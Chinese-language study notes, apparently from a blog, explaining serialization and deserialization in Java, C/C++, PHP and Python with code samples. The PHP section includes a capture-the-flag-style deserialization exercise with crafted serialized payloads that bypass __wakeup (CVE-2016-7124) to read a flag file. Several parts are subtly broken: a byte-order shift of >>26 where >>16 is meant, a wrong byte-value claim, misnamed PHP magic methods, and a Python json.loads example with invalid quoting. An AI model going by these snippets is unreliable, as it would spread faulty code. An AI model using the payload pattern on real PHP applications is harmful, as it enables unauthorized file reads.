批注
[……] 表示他人、自己、网络批注
参考资料来源于
* 书中批注
* 优快云
* GitHub
* Google
* 维基百科
* YouTube
* MDN Web Docs
由于编写过程中无法记录所有的URL
所以如需原文,请自行查询
{……} 重点内容
*……* 表示先前提到的内容,不赘述
外增其余Web攻击详解
「第一篇」序列化与反序列化
「1.1Java序列化与反序列化」
1.1.1基本概念
1.1.1.1序列化和反序列化的定义
Java序列化就是指把Java对象转换为字节序列的过程
Java反序列化就是指把字节序列恢复为Java对象的过程
序列化最重要的作用
在传递和保存对象时保证对象的完整性和可传递性,对象转换为有序字节流,以便在网络上传输或者保存在本地文件中
反序列化最重要的作用
根据字节流中保存的对象状态及描述信息,通过反序列化重建对象
核心作用就是对象状态的保存和重建(整个过程核心点就是字节流中所保存的对象状态及描述信息)
1.1.1.2json/xml的数据传递
在数据传输(也可称为网络传输)前,先通过序列化工具类将Java对象序列化为json/xml文件
在数据传输(也可称为网络传输)后,再将json/xml文件反序列化为对应语言的对象
1.1.1.3序列化优点
* 将对象转为字节流存储到硬盘上,当JVM停机的话,字节流还会在硬盘上默默等待,等待下一次JVM的启动,把序列化的对象,通过反序列化为原来的对象,并且序列化的二进制序列能够减少存储空间(永久性保存对象)
* 序列化成字节流形式的对象可以进行网络传输(二进制形式),方便了网络传输
* 通过序列化可以在进程间传递对象
1.1.1.4序列化算法需要做的事
* 将对象实例相关的类元数据输出
* 递归地输出类的超类描述直到不再有超类
* 类元数据输出完毕后,从最顶端的超类开始输出对象实例的实际数据值
* 从上至下递归输出实例的数据
1.1.2Java实现序列化和反序列化的过程
1.1.2.1实现序列化的必备要求
只有实现了Serializable或者Externalizable接口的类的对象才能被序列化为字节序列(不是则会抛出异常)
1.1.2.2JDK中序列化和反序列化的API
* java.io.ObjectInputStream(对象输入流)
该类的readObject()方法从输入流中读取字节序列,然后将字节序列反序列化为一个对象并返回
* java.io.ObjectOutputStream(对象输出流)
该类的writeObject(Object obj)方法将将传入的obj对象进行序列化,把得到的字节序列写入到目标输出流中进行输出
1.1.2.3实现序列化和反序列化的三种实现
* 若Student类仅仅实现了Serializable接口,则可以按照以下方式进行序列化和反序列化
ObjectOutputStream采用默认的序列化方式,对Student对象的非transient的实例变量进行序列化
ObjcetInputStream采用默认的反序列化方式,对Student对象的非transient的实例变量进行反序列化
* 若Student类仅仅实现了Serializable接口,并且还定义了readObject(ObjectInputStream in)和writeObject(ObjectOutputSteam out),则采用以下方式进行序列化与反序列化
ObjectOutputStream调用Student对象的writeObject(ObjectOutputStream out)的方法进行序列化
ObjectInputStream会调用Student对象的readObject(ObjectInputStream in)的方法进行反序列化
* 若Student类实现了Externalnalizable接口,且Student类必须实现readExternal(ObjectInput in)和writeExternal(ObjectOutput out)方法,则按照以下方式进行序列化与反序列化
ObjectOutputStream调用Student对象的writeExternal(ObjectOutput out))的方法进行序列化
ObjectInputStream会调用Student对象的readExternal(ObjectInput in)的方法进行反序列化
1.1.2.4序列化和反序列化代码示例
-------------------------------------------------------------------------------------
public class SerializableTest
{
public static void main(String[] args) throws IOException, ClassNotFoundException
{
//序列化
FileOutputStream fos = new FileOutputStream("object.out");
ObjectOutputStream oos = new ObjectOutputStream(fos);
Student student1 = new Student("lihao", "wjwlh", "21");
oos.writeObject(student1);
oos.flush();
oos.close();
//反序列化
FileInputStream fis = new FileInputStream("object.out");
ObjectInputStream ois = new ObjectInputStream(fis);
Student student2 = (Student) ois.readObject();
System.out.println(student2.getUserName()+ " " +
student2.getPassword() + " " + student2.getYear());
}
}
-------------------------------------------------------------------------------------
-----------------------------------------------------------------------
public class Student implements Serializable
{
private static final long serialVersionUID = -6060343040263809614L;
private String userName;
private String password;
private String year;
public String getUserName()
{
return userName;
}
public String getPassword()
{
return password;
}
public void setUserName(String userName)
{
this.userName = userName;
}
public void setPassword(String password)
{
this.password = password;
}
public String getYear()
{
return year;
}
public void setYear(String year)
{
this.year = year;
}
public Student(String userName, String password, String year)
{
this.userName = userName;
this.password = password;
this.year = year;
}
}
-----------------------------------------------------------------------
1.1.3序列化和反序列化的注意点
* 序列化时,只对对象的状态进行保存,而不管对象的方法
* 当一个父类实现序列化,子类自动实现序列化,不需要显式实现Serializable接口
* 当一个对象的实例变量引用其他对象,序列化该对象时也把引用对象进行序列化
* 并非所有的对象都可以序列化,至于为什么不可以,有很多原因了
* 安全方面的原因,比如一个对象拥有private,public等field,对于一个要传输的对象,比如写到文件,或者进行RMI传输等等,在序列化进行传输的过程中,这个对象的private等域是不受保护的
* 资源分配方面的原因,比如socket,thread类,如果可以序列化,进行传输或者保存,也无法对他们进行重新的资源分配,而且,也是没有必要这样实现
* 声明为static和transient类型的成员数据不能被序列化,因为static代表类的状态,transient代表对象的临时数据
* 序列化运行时使用一个称为 serialVersionUID的版本号与每个可序列化类相关联,该序列号在反序列化过程中用于验证序列化对象的发送者和接收者是否为该对象加载了与序列化兼容的类为它赋予明确的值
显式地定义serialVersionUID有两种用途
* 在某些场合,希望类的不同版本对序列化兼容,因此需要确保类的不同版本具有相同的serialVersionUID
* 在某些场合,不希望类的不同版本对序列化兼容,因此需要确保类的不同版本具有不同的serialVersionUID
* Java有很多基础类已经实现了serializable接口,比如String,Vector等,但是也有一些没有实现serializable接口的
* 如果一个对象的成员变量是一个对象,那么这个对象的数据成员也会被保存,这是能用序列化解决深拷贝的重要原因
{浅拷贝请使用Clone接口的原型模式}
「1.2C/C++序列化与反序列化」
序列化指的是将一个内存对象转化成一串字节数据(存储在一个字节数组中),可用于保存到本地文件或网络传输
反序列化就是将字节数据还原成内存对象
----------------
struct student
{
int id;
string name;
};
----------------
将一个student对象转换成字节数据存储在ByteArray[20]中称为序列化代码
-------------------------------------------------------
int count = 0;
char ByteArray[20];
student s;
s.id = 12;
s.name = "specialist";
memcpy(ByteArray,&s.id,sizeof(s.id));
count += sizeof(s.id);
memcpy(ByteArray+count,s.name.c_str(),s.name.length());
count += s.name.length();
-------------------------------------------------------
把字节数据还原成student对象称为反序列化代码
---------------------------------------
student ss;
memcpy(&ss.id,ByteArray,sizeof(ss.id));
ss.name.append(ByteArray+4,count-4);
---------------------------------------
其实在上述代码中存在问题只是memcpy函数隐藏了这个细节
在vs的内存窗口中我们可以看到s.id的内存视图为0c 00 00 00(16进制),这似乎和我们想的00 00 00 0c不一样,这就是所谓的大端系统(内存中高位字节在前)和小端系统(内存中低位字节在前),而目前我们的系统大多是小端系统,而一般在网络传输中却规定使用大端传输(如果不规定当我们将0c 00 00 00这四个字节传给对方,对方就不清楚这四个字节的值?0c 00 00 00 or 00 00 00 0c),我们用memcpy函数的时候实际上就是对内存的拷贝,而前面讲了在小端系统中对于s.id这个值拷贝到bytearray中的肯定是0c 00 00 00,然后接收端接收到的是0c 00 00 00以为你发是12的6次方(也不一定如果对端也是用的C语言直接用memcpy将0c 00 00 00拷贝s.id对应的内存,s.id的值还是12,就如上述代码,但是客户端和服务端的语言不一定一样),这显然与你想发的12差太多了,于是我们使用位操作(语言无关)来实现序列化与反序列化,以s.id为例代码如(注意位操作针对的是数值本身而非内存不要搞混了)
-----------------------------------------------
/*移位之后ByteArray中前四个字节存的便是00 00 00 0c*/
ByteArray[0] = s.id>>24;
ByteArray[1] = s.id>>26;
ByteArray[2] = s.id>>8;
ByteArray[3] = s.id;
-----------------------------------------------
接收端再移回来就行了
-------------------------
s.id += ByteArray[0]<<24;
s.id += ByteArray[1]<<16;
s.id += ByteArray[2]<<8;
s.id += ByteArray[3];
-------------------------
「1.3php序列化与反序列化」
1.3.1serialize
序列化是将变量或对象转换成字符串的过程
------------------------------------------------
<?php
class man
{
public $name;
public $age;
public $height;
function __construct($name,$age,$height)
{
//_construct:创建对象时初始化
$this->name = $name;
$this->age = $age;
$this->height = $height;
}
}
$man=new man("Bob",5,20);
var_dump(serialize($man));
?>
------------------------------------------------
输出
string(67) "O:3:"man":3:{s:4:"name";s:3:"Bob";s:3:"age";i:5;s:6:"height";i:20;}"
Object(O): O:<class_name_length>:"<class_name>":<number_of_properties>:{<properties>}
Boolean(b): b:value;(0或1)
double(d)
integer(i): i:value;
array(a): a:<length>:{key,keyvalue}
string(s): s:<length>:value;
null(N)
1.3.2unserialize
反序列化是将字符串转换成变量或对象的过程
--------------------------------------------------------------------------------
<?php
class man
{
public $name;
public $age;
public $height;
function __construct($name,$age,$height)
{
$this->name = $name;
$this->age = $age;
$this->height = $height;
}
}
$man= 'O:3:"man":3:{s:4:"name";s:3:"Bob";s:3:"age";i:5;s:6:"height";i:20;}';
var_dump(unserialize($man));
?>
--------------------------------------------------------------------------------
输出
object(man)#1 (3)
{
["name"]=>
string(3) "Bob"
["age"]=>
int(5)
["height"]=>
int(20)
}
1.3.3反序列化漏洞
两个条件
* unserialize()函数的参数可控
* php中有可以利用的类并且类中有魔幻函数
魔幻函数
_construct():创建对象时初始化
_destruction():结束时销毁对象
_toString():对象被当作字符串时使用
_sleep():序列化对象之前调用
_wakeup():反序列化之前调用
_call():调用对象不存在时使用
_get():调用私有属性时使用
index.php
--------------------------------------------------------------------------------------
<?php
class SoFun
{
public $file='index.php';
function __destruct()
{
if(!empty($this->file))
{
if(strchr($this-> file,"\\")===false && strchr($this->file, '/')===false)
{
echo "<br>";
show_source(dirname (__FILE__).'/'.$this ->file);
}
else
die('Wrong filename.');
}
}
function __wakeup()
{
$this-> file='index.php';
}
public function __toString(){return '' ;}
}
if (!isset($_GET['file']))
{
show_source('index.php');
}
else
{
$file = $_GET['file'];
echo unserialize($file);
}
?>
<!--key in flag.php-->
--------------------------------------------------------------------------------------
flag.php
------------------------
<?php
echo "key{you got it!!}"
?>
------------------------
代码审计
* 代码最后提示key在flag.php里,因此我们要想办法读里面的内容
* 在__destruct()魔术方法中,show_source(dirname (__FILE__).'/'.$this ->file)这里是解题的关键,在反序列化之后会自动调用__destruct方法,可以利用这个将flag.php的内容读出来
* 在__wakeup()魔术方法中,在反序列化后会自动调用__wakeup方法并将file的值置为index.php
* 我们要想读出flag.php里的内容需要调用__destruct方法而绕过__wakeup方法
这里要用到CVE-2016-7124漏洞:当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行
构造序列化对象:O:5:"SoFun":1:{s:4:"file";s:8:"flag.php";}
构造绕过__wakeup:O:5:"SoFun":2:{s:4:"file";s:8:"flag.php";}
「1.4python序列化与反序列化」
1.4.1Pyhton在json中load和loads区别
相同点
dump和dumps都实现了序列化
load和loads都实现反序列化
变量从内存中变成可存储或传输的过程称之为序列化
序列化是将对象状态转化为可保存或可传输格式的过程
变量内容从序列化的对象重新读到内存里称之为反序列化
反序列化是流转换为对象
区别
load和loads(反序列化)
load
针对文件句柄,将json格式的字符转换为dict,从文件中读取(将string转换为dict)
-----------------------------------------
a_json = json.load(open('demo.json','r'))
-----------------------------------------
loads
针对内存对象,将string转换为dict (将string转换为dict)
-----------------------------------------
a = json.loads('{'a':'1111','b':'2222'}')
-----------------------------------------
dump和dumps(序列化)
dump
将dict类型转换为json字符串格式,写入到文件(易存储)
----------------------------------------
a_dict = {'a':'1111','b':'2222'}
json.dump(a_dict, open('demo.json', 'w')
----------------------------------------
dumps
将dict转换为string(易传输)
--------------------------------
a_dict = {'a':'1111','b':'2222'}
a_str = json.dumps(a_dict)
--------------------------------
1.4.2总结
根据序列化和反序列的特性
loads: 是将string转换为dict
dumps: 是将dict转换为string
load: 是将里json格式字符串转化为dict,读取文件
dump: 是将dict类型转换为json格式字符串,存入文件
JSON进阶
序列化
------------------------------------------------------
# 使用class对象的__dict__方法
class Student(object):
def __init__(self, name, age, score):
self.name = name
self.age = age
self.score = score
import json
s = Student('Bob', 20, 88)
print(json.dumps(s, default=lambda obj: obj.__dict__))
------------------------------------------------------
反序列化
-----------------------------------------------------
def dict2student(d):
return Student(d['name'], d['age'], d['score'])
json_str = '{"age": 20, "score": 88, "name": "Bob"}'
print(json.loads(json_str, object_hook=dict2student))
-----------------------------------------------------
1.4.3python中的序列化和反序列化
Python提供两个模块来实现序列化
* cPickle
* pickle
这两个模块功能是一样的,区别在于cPickle是C语言写的,速度快,pickle是纯Python写的,速度慢
变量从内存中变成可存储或传输的过程称之为序列化,在Python中叫pickling
变量内容从序列化的对象重新读到内存里称之为反序列化,即unpickling
----------------------------
try:
import cPickle as pickle
except ImportError:
import pickle
----------------------------
将内存对象存取到磁盘
------------------------------------------
a = dict(a=1, b=2, c=3)
pickle.dumps(a)# 将对象序列化为str然后存入文件
------------------------------------------
-------------------------------------------------------------------------------------------
a = dict(a=1, b=2, c=3)
pickle.dump(a, open('a.txt', 'wb'))# 使用dump直接把对象序列化为file-like Object,注意是二进制存储
-------------------------------------------------------------------------------------------
从磁盘读取到内存对象
-------------------------------------------------------------------
pickle.load(open('a.txt', 'rb'))#从file-like Object中直接反序列化出对象
-------------------------------------------------------------------
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
